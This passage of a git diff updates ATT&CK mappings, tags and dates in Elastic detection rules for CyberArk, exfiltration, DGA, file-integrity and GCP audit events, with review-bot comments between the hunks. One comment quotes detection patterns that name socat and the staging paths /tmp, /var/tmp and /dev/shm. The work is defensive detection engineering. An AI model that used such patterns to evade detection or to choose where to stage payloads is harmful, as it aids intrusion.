Layer Protocol" +id = "T1071" +reference = "https://attack.mitre.org/techniques/T1071/" diff --git a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml index 6fa3c4dc37a..92c6ca0ff81 100644 --- a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml +++ b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2021/06/23" integration = ["cyberarkpas"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -48,3 +48,23 @@ event.dataset:cyberarkpas.audit and event.type:error ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml index a57b73397a5..ae927878370 100644 --- a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml +++ b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2021/06/23" integration = ["cyberarkpas"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
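Review bot: Several patterns in the new query look like typos that silently disable them: `" *socat *"` has a leading space, so it only matches an argument that begins with a space, and `"* /tmp/* "`, `"* /var/tmp/* "` and `"* /dev/shm/* "` end in a space, so a command that ends with the path does not match; remove the stray spaces. The exclusion lists also contain exact duplicates (`"/usr/local/bin/php -r 'echo phpversion();'"` twice under apache2 and `"/usr/bin/php -r 'echo phpversion();'"` twice under php-fpm), which suggests a copy/paste that was meant to cover a different binary path. The `[rule.threat.tactic]` tables in this file are placed before `[[rule.threat.technique]]` with `name` before `id`, unlike the other new rule in this patch, so align the ordering for clean diffs.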
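Review bot: The second `[[rule.threat]]` entry added here carries only an Initial Access tactic and no technique, although T1078 Valid Accounts, the technique used in the first entry, is itself an Initial Access technique; either attach `[[rule.threat.technique]]` T1078 to the Initial Access entry as well, or drop the tactic-only entry so the mapping states what it means. The block also has irregular spacing (no blank line after `framework`, two blank lines before `[rule.threat.tactic]`, none before the second `[[rule.threat]]`, and a trailing blank line) unlike the other threat sections in this patch. The same shape is repeated in the recommended_events_to_monitor promotion rule that follows.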
@@ -51,3 +51,23 @@ event.dataset:cyberarkpas.audit and
 '''
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml
index 1080888e570..cd93d27121e 100644
--- a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml
+++ b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml
@@ -2,7 +2,7 @@ creation_date = "2023/09/22"
 integration = ["ded", "endpoint", "network_traffic"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 anomaly_threshold = 75
@@ -44,7 +44,13 @@ The Data Exfiltration Detection integration detects data exfiltration activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Data Exfiltration Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Data Exfiltration Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Exfiltration",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 note = """## Triage and analysis
 
@@ -83,26 +89,14 @@ Machine learning models analyze network traffic to identify anomalies, such as d
 - Implement enhanced monitoring on the affected system and network segment to detect any further suspicious activity."""
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1571"
-name = "Non-Standard Port"
-reference = "https://attack.mitre.org/techniques/T1571/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1041"
 name = "Exfiltration Over C2 Channel"
 reference = "https://attack.mitre.org/techniques/T1041/"
+
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
+
diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml
index fc59e19bd27..8e885a4b26b 100644
--- a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml
+++ b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml
@@ -2,7 +2,7 @@ creation_date = "2023/09/22"
 integration = ["ded", "endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 anomaly_threshold = 75
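Review bot: Removing the Command and Control entry drops T1571 (Non-Standard Port), the technique that named this rule's actual signal — an unusual byte volume toward a destination port — and leaves only T1041 under Exfiltration. If the intent is to narrow the rule to a single tactic, the description and investigation guide (outside this hunk) should be checked for remaining command-and-control wording; otherwise keeping the T1571 entry alongside T1041 loses nothing. The hunk also appends a trailing blank line at end of file.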
@@ -89,18 +89,14 @@ The detection rule leverages machine learning to identify anomalies in data tran
 - Consider deploying endpoint detection and response (EDR) solutions to enhance visibility and control over data movements to external devices."""
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1052"
 name = "Exfiltration Over Physical Medium"
 reference = "https://attack.mitre.org/techniques/T1052/"
-[[rule.threat.technique.subtechnique]]
-id = "T1052.001"
-name = "Exfiltration over USB"
-reference = "https://attack.mitre.org/techniques/T1052/001/"
 
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
+
diff --git a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml
index 321ed5158e3..d0c800d51aa 100644
--- a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml
+++ b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml
@@ -2,7 +2,7 @@ creation_date = "2023/09/22"
 integration = ["ded", "endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 anomaly_threshold = 75
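Review bot: Dropping the T1052.001 (Exfiltration over USB) sub-technique leaves the rule mapped only to the parent T1052, which is less precise than what the rule detects (writes to an external device). The same precision loss appears in the hunks for exfiltration_ml_rare_process_writing_to_external_device.toml (T1052.001), command_and_control_ml_dga_high_sum_probability.toml (T1568.002), the three gcp firewall-rule rules (T1562.007) and the two gcp logging deletion rules (T1562.008); unless ATT&CK has retired these sub-techniques, keeping them costs nothing and coverage reports are otherwise understated. Each of these hunks also removes the blank line after `framework` and appends a trailing blank line at end of file, so the files no longer share one layout.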
@@ -89,18 +89,14 @@ In modern environments, processes may write data to external devices for legitim
 - Update security policies and controls to prevent similar exfiltration attempts, such as restricting process permissions to write to external devices and enhancing endpoint protection measures."""
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1052"
 name = "Exfiltration Over Physical Medium"
 reference = "https://attack.mitre.org/techniques/T1052/"
-[[rule.threat.technique.subtechnique]]
-id = "T1052.001"
-name = "Exfiltration over USB"
-reference = "https://attack.mitre.org/techniques/T1052/001/"
 
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
+
diff --git a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml
index 411f171e203..afcf159faef 100644
--- a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml
+++ b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml
@@ -2,7 +2,7 @@ creation_date = "2023/09/14"
 integration = ["dga", "endpoint", "network_traffic"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 anomaly_threshold = 70
@@ -96,18 +96,14 @@ Domain Generation Algorithms (DGAs) are used by malware to dynamically generate
 - Escalate to incident response team: If the threat is confirmed and widespread, escalate the incident to the organization's incident response team for further investigation and coordinated response efforts."""
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1568"
 name = "Dynamic Resolution"
 reference = "https://attack.mitre.org/techniques/T1568/"
-[[rule.threat.technique.subtechnique]]
-id = "T1568.002"
-name = "Domain Generation Algorithms"
-reference = "https://attack.mitre.org/techniques/T1568/002/"
 
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
+
diff --git a/rules/integrations/fim/persistence_suspicious_file_modifications.toml b/rules/integrations/fim/persistence_suspicious_file_modifications.toml
index 98869db8820..4ef9a45946f 100644
--- a/rules/integrations/fim/persistence_suspicious_file_modifications.toml
+++ b/rules/integrations/fim/persistence_suspicious_file_modifications.toml
@@ -2,7 +2,7 @@ creation_date = "2024/06/03"
 integration = ["fim"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/04"
 
 [rule]
 author = ["Elastic"]
@@ -47,7 +47,17 @@ To configure the Elastic FIM integration, follow these steps:
 For more details on configuring the Elastic FIM integration, you can refer to the [Elastic FIM documentation](https://docs.elastic.co/integrations/fim).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: File Integrity Monitoring", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Credential Access",
+ "Tactic: Privilege Escalation",
+ "Tactic: Defense Evasion",
+ "Data Source: File Integrity Monitoring",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -210,39 +220,24 @@ name = "RC Scripts"
 reference = "https://attack.mitre.org/techniques/T1037/004/"
 
 [[rule.threat.technique]]
-id = "T1053"
-name = "Scheduled Task/Job"
-reference = "https://attack.mitre.org/techniques/T1053/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1053.003"
-name = "Cron"
-reference = "https://attack.mitre.org/techniques/T1053/003/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1053.006"
-name = "Systemd Timers"
-reference = "https://attack.mitre.org/techniques/T1053/006/"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
 
 [[rule.threat.technique.subtechnique]]
-id = "T1098.004"
-name = "SSH Authorized Keys"
-reference = "https://attack.mitre.org/techniques/T1098/004/"
+id = "T1547.006"
+name = "Kernel Modules and Extensions"
+reference = "https://attack.mitre.org/techniques/T1547/006/"
 
 [[rule.threat.technique]]
-id = "T1542"
-name = "Pre-OS Boot"
-reference = "https://attack.mitre.org/techniques/T1542/"
+id = "T1136"
+name = "Create Account"
+reference = "https://attack.mitre.org/techniques/T1136/"
 
 [[rule.threat.technique.subtechnique]]
-id = "T1542.003"
-name = "Bootkit"
-reference = "https://attack.mitre.org/techniques/T1542/003/"
+id = "T1136.001"
+name = "Local Account"
+reference = "https://attack.mitre.org/techniques/T1136/001/"
 
 [[rule.threat.technique]]
 id = "T1543"
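Review bot: The Persistence entry loses T1053.003 (Cron), T1053.006 (Systemd Timers), T1098.004 (SSH Authorized Keys) and T1542.003 (Bootkit) and gains T1547.006 and T1136.001; the next hunk on this file also drops T1546.004/.017, T1547.013 and T1556.003, and T1053 only reappears under Privilege Escalation with T1053.003, so systemd timers, authorized_keys, PAM and udev no longer occur anywhere in the mapping. If the rule's monitored path list (outside these hunks) still covers cron, systemd timer, SSH key, PAM and udev locations, the mapping now under-describes what the rule fires on; confirm against the query before dropping them. T1136.001 (Local Account) for a file-integrity rule is only justified if the watched paths include the local account database files — a one-line rationale in the commit would help the next maintainer.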
@@ -254,46 +249,11 @@ id = "T1543.002"
 name = "Systemd Service"
 reference = "https://attack.mitre.org/techniques/T1543/002/"
 
-[[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1546.004"
-name = "Unix Shell Configuration Modification"
-reference = "https://attack.mitre.org/techniques/T1546/004/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1546.017"
-name = "Udev Rules"
-reference = "https://attack.mitre.org/techniques/T1546/017/"
-
-[[rule.threat.technique]]
-id = "T1547"
-name = "Boot or Logon Autostart Execution"
-reference = "https://attack.mitre.org/techniques/T1547/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1547.006"
-name = "Kernel Modules and Extensions"
-reference = "https://attack.mitre.org/techniques/T1547/006/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1547.013"
-name = "XDG Autostart Entries"
-reference = "https://attack.mitre.org/techniques/T1547/013/"
-
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1556.003"
-name = "Pluggable Authentication Modules"
-reference = "https://attack.mitre.org/techniques/T1556/003/"
-
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
@@ -312,6 +272,16 @@ reference = "https://attack.mitre.org/tactics/TA0003/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1053"
+name = "Scheduled Task/Job"
+reference = "https://attack.mitre.org/techniques/T1053/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1053.003"
+name = "Cron"
+reference = "https://attack.mitre.org/techniques/T1053/003/"
+
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
@@ -326,3 +296,29 @@ reference = "https://attack.mitre.org/techniques/T1548/003/"
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1014"
+name = "Rootkit"
+reference = "https://attack.mitre.org/techniques/T1014/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml
index f97dd000f8a..2f2e473a30c 100644
--- a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml
+++ b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/23"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -82,3 +82,16 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.CreateTopic
 '''
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1530"
+name = "Data from Cloud Storage"
+reference = "https://attack.mitre.org/techniques/T1530/"
+
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml
index b7893e2fc97..6999cef9783 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/21"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -87,18 +87,14 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.insert or google.a
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1562.007"
-name = "Disable or Modify Cloud Firewall"
-reference = "https://attack.mitre.org/techniques/T1562/007/"
 
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml
index dc90f3eb665..6ac6b9d0085 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/21"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -84,18 +84,14 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.delete or google.a
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1562.007"
-name = "Disable or Modify Cloud Firewall"
-reference = "https://attack.mitre.org/techniques/T1562/007/"
 
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml
index 8e59ea4e070..3afdc0d904e 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/21"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -87,18 +87,14 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.patch or google.ap
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1562.007"
-name = "Disable or Modify Cloud Firewall"
-reference = "https://attack.mitre.org/techniques/T1562/007/"
 
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml
index 427c2ce5776..0959ed9e33e 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/21"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -84,18 +84,14 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
 
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml
index 38802e77eaa..36bd43f1c07 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/18"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -81,18 +81,14 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
 
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml
index 3f132004437..b232902cc6d 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/23"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -64,7 +64,14 @@ references = ["https://cloud.google.com/pubsub/docs/overview"]
 risk_score = 21
 rule_id = "cc89312d-6f47-48e4-a87c-4977bd4633c3"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: GCP",
+ "Data Source: Google Cloud Platform",
+ "Use Case: Log Auditing",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
 
@@ -75,13 +82,14 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.DeleteSubsc
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
 
 [rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml
index 796f221eb75..01e2afac043 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/18"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
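Review bot: The replacement mapping uses the bare T1562 (Impair Defenses) for a Pub/Sub subscription deletion; if the rationale is that such subscriptions carry exported audit logs, the sub-technique T1562.008 (Disable or Modify Cloud Logs) says so directly, whereas the parent alone gives an analyst no hint why deleting a subscription counts as evasion. The same substitution is made for defense_evasion_gcp_pub_sub_topic_deletion.toml in the next hunk. Layout-wise the new side adds a blank line after the technique's `reference` where a context blank already follows, and a trailing blank line at end of file.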
@@ -65,7 +65,14 @@ references = ["https://cloud.google.com/pubsub/docs/overview"]
 risk_score = 21
 rule_id = "3202e172-01b1-4738-a932-d024c514ba72"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: GCP",
+ "Data Source: Google Cloud Platform",
+ "Use Case: Log Auditing",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
 
@@ -76,13 +83,14 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.DeleteTopic
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
 
 [rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml
index ae4dd9b718b..66e67424205 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/21"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -64,7 +64,14 @@ references = ["https://cloud.google.com/storage/docs/access-control/iam-permissi
 risk_score = 47
 rule_id = "2326d1b2-9acf-4dee-bd21-867ea7378b4d"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: GCP",
+ "Data Source: Google Cloud Platform",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
 
@@ -75,36 +82,14 @@ event.dataset:gcp.audit and event.action:"storage.setIamPermissions" and event.o
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1222"
+name = "File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
 
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
